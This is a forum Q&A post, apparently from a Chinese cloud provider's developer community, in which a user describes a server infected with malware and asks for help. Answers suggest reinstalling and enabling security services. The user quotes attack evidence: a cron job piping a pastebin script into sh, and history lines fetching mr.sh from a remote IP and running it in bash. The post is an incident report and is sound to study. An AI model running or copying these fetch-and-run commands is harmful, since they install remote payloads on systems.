开发者社区> 问答> 正文

机器中了木马

感觉机器应该是中了木马,有一下几个现象:

1. 异常定时任务
root@iZ2ze82p1dogvdrx4fu0i7Z:~# cat /var/spool/cron/crontabs/root 
*/31 * * * *    /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
##

2. 某些指令被劫持,比如top指令不正常显示系统使用指标,而是显示
root@iZ2ze82p1dogvdrx4fu0i7Z:~# top
  PID TTY          TIME CMD
31637 pts/3    00:00:00 bash
32078 pts/3    00:00:00 top

3. 通过history指令查看到一些异常的历史操作
 1878  2018-09-10 15:18:59 root wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh
 1879  2018-09-02 15:03:03 root ufw status
 1880  2018-09-02 15:04:49 root curl -s http://192.99.142.248:8220/

请协助分析并解决问题。

展开
收起
1493220386911762 2018-09-10 15:24:19 831 0
4 条回答
写回答
取消 提交回答
  • 本回答引用自以下KB文档:ECS实例感染木马病毒后的解决方法

    更多帮助请访问以下站点:

    2020-12-22 11:26:53
    赞同 1 展开评论 打赏
  • 郑州云淘科技有限公司 www.yuntaokeji.com QQ号码78315851
    中毒问题排查确实比较麻烦。如果可以尝试备份数据后重做系统。
    2018-09-10 15:46:02
    赞同 展开评论 打赏
  • 建议您进行系统安全加固下或者 开启云盾服务,并开启所有云盾安全防护功能对您的主机进行安全防护,免于再次遭到恶意攻击。

      实施安全防御方案

      请您尽快开启云盾服务,开启步骤详见:http://help.aliyun.com/view/11108300_13730770.html

      同时也建议您开启云盾应用防火墙功能,开启步骤详见:

    http://help.aliyun.com/view/11108300_13857395.html

    2018-09-10 15:25:12
    赞同 展开评论 打赏
  • 建议使用安骑士对服务器进行扫描
    望采纳,谢谢!
    2018-09-10 15:24:57
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
低代码开发师(初级)实战教程 立即下载
冬季实战营第三期:MySQL数据库进阶实战 立即下载
阿里巴巴DevOps 最佳实践手册 立即下载